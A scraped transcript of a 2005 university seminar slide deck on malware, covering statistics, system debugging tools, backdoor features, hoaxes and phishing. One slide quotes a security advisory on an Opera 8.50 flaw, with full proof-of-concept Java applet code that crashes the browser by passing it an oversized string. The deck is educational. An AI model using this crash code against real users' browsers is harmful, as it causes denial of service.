1 / 14

Malware – Cont.

Malware – Cont. Maxim Vainstein & Emanuel Hahamov HUJI, CS, Seminar in Software Design 08.12.2005. Malware Statistic. Malware Statistic Cont. Take it “easy”…. Take it “easy”… (Cont.). Malware – Example. Malware – Example(2) Opera Java Applet DoS. Summary

tao
Download Presentation

Malware – Cont.

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Malware – Cont. Maxim Vainstein & Emanuel Hahamov HUJI, CS, Seminar in Software Design 08.12.2005

  2. Malware Statistic

  3. Malware Statistic Cont.

  4. Take it “easy”…

  5. Take it “easy”… (Cont.)

  6. Malware – Example

  7. Malware – Example(2)Opera Java Applet DoS • Summary Opera is "a computer application for handling most common internet-related tasks, including: web browsing, sending and receiving messages, managing contacts and online chat". A vulnerability in a Opera allows remote attackers to cause the program to crash by utilizing a malicious Java applet. • Details Vulnerable Systems: * Opera version 8.50 Immune Systems: * Opera version 8.51 It is possible to crash the opera 8.50 browser with a simple java Applet (see below). This was observed on Win32, Linux versions maybe affected, too. This can be tested at: http://www.illegalaccess.org/exploit/opera85/OperaApplet.html As you can see the applet crashes at 0x67c0a54c. This is caused by a bug in a JNI routine implementing the com.opera.JSObject class. It cannot beruled out, that this bug is exploitable. The opera guys were informed on the 21st of September, and then again on 8th of October. • Code • Additional InformationThe information has been provided by  <mailto:marc.schoenefeld@gmx.org>Marc Schoenefeld. import java.applet.Applet; import java.awt.Graphics; import netscape.javascript.JSObject; public class OperaTest extends Applet{ static { System.out.println("Loaded 1.2"); } public void paint(Graphics g) { System.out.println("start"); try { netscape.javascript.JSObject jso = JSObject.getWindow(this); System.out.println(jso.getClass()); com.opera.JSObject j = (com.opera.JSObject ) jso; char[] x = new char[1000000]; for (int y = 0 ; y < x.length; y++) { x [y] = 'A'; } String z = new String(x); System.out.println("after evalb"); j.removeMember(z); System.out.println("after remove"); } catch (Exception e) { e.printStackTrace(); } } }

  8. System Debug Tools • SysInternals - www.sysinternals.com • Process Explorer • FileMon • RegMon • TcpView • TDIMon • WinObj • More… • Emsi A2-HijackFree • LSPfix • TaskManager16 • Ethreal Network Sniffer

  9. Advanced Remote Control Backdoor Key logger Screen capture Multimedia Capture Video Sound Microphone False Remote Administration/Helpdesk ?! NetBus - Demo

  10. More Malware

  11. Scams and Hoaxes • Malware-related • False Information (to force user for unwanted action) • Scams And Shams • Luck-based hoaxes • Money-based hoaxes • Urban Legends

  12. Jokes (JOKE_BURST.A, JOKE_TRAIN.B) • No malicious code, but can be noisy

  13. Phishing – Local/Web Network Redirection • False known website • Banks • eCommerce • eMails

  14. Questions ?

More Related